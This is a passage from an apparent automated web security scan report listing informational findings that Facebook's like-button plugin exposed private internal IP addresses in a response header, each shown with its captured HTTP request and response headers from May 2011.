GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b463129%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff417c8108%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.61.54
X-Cnection: close
Date: Mon, 09 May 2011 15:37:15 GMT
Content-Length: 10000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.8. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.128.57

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1645adb2c%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff22a290894%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.128.57
X-Cnection: close
Date: Mon, 09 May 2011 15:41:57 GMT
Content-Length: 10006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.9. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.79.43

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c6192704%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff148f0b54%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/aboutus/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.79.43
X-Cnection: close
Date: Mon, 09 May 2011 15:38:59 GMT
Content-Length: 10020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.10. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.118.35

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df209e0862%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff56406db8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.118.35
X-Cnection: close
Date: Mon, 09 May 2011 15:39:07 GMT
Content-Length: 10000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.11. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.55.10.36

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.10.36
X-Cnection: close
Date: Mon, 09 May 2011 15:36:10 GMT
Content-Length: 6900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.12. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.75.60

Request

GET /plugins/like.php?href=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm%2Fpage%2Fto%2Flike&layout=button_count&show_faces=false&width=125&action=recommend&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.75.60
X-Cnection: close
Date: Mon, 09 May 2011 15:36:54 GMT
Content-Length: 7034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.13. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.60.37

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.fox8live.com%2fs%2fywVthjF5R0-TVfelFm18GA.cspx&layout=standard&show_faces=false&width=375&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.60.37
X-Cnection: close
Date: Mon, 09 May 2011 15:41:40 GMT
Content-Length: 8113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.14. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.64.56

Request

GET /plugins/like.php?href=http%3A//www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm%2Fpage%2Fto%2Flike&layout=button_count&show_faces=false&width=125&action=recommend&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.64.56
X-Cnection: close
Date: Mon, 09 May 2011 15:38:02 GMT
Content-Length: 7034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.15. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.78.51

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.csmonitor.com%2FBusiness%2F2011%2F0509%2FGas-prices-start-to-head-down&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=box_count&action=recommend&width=90&height=65 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.78.51
X-Cnection: close
Date: Mon, 09 May 2011 15:39:17 GMT
Content-Length: 6932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.16. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.22.29

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.fox8live.com%2fs%2fvJUO9a9n60iNAXZ6QCm2oQ.cspx&layout=standard&show_faces=false&width=375&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.22.29
X-Cnection: close
Date: Mon, 09 May 2011 15:37:54 GMT
Content-Length: 8109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.17. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.124.25

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.fox8live.com%2fs%2fvJUO9a9n60iNAXZ6QCm2oQ.cspx&layout=standard&show_faces=false&width=375&action=recommend&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.25
X-Cnection: close
Date: Mon, 09 May 2011 15:37:59 GMT
Content-Length: 8109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.18. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response (in the X-FB-Server header):

10.54.61.49

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e97b0d54%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff3b7816684%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.61.49
X-Cnection: close
Date: Mon, 09 May 2011 15:39:13 GMT
Content-Length: 10036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.19. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32a70df5%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff2ade04cb%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/entertainment/horoscopes/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.101.25
X-Cnection: close
Date: Mon, 09 May 2011 15:41:53 GMT
Content-Length: 10035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.20. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=facebook.com/ChristianScienceMonitor&layout=button_count&show_faces=true&width=110&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.35.45
X-Cnection: close
Date: Mon, 09 May 2011 15:38:08 GMT
Content-Length: 6943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

21.21. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e330ccb%26origin%3Dhttp%253A%252F%252Fwww.fox8live.com%252Ff3f167c8d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.facebook.com%2F%23!%2Fpages%2FWVUE-FOX-8-News%2F107322144609&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/watercooler/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
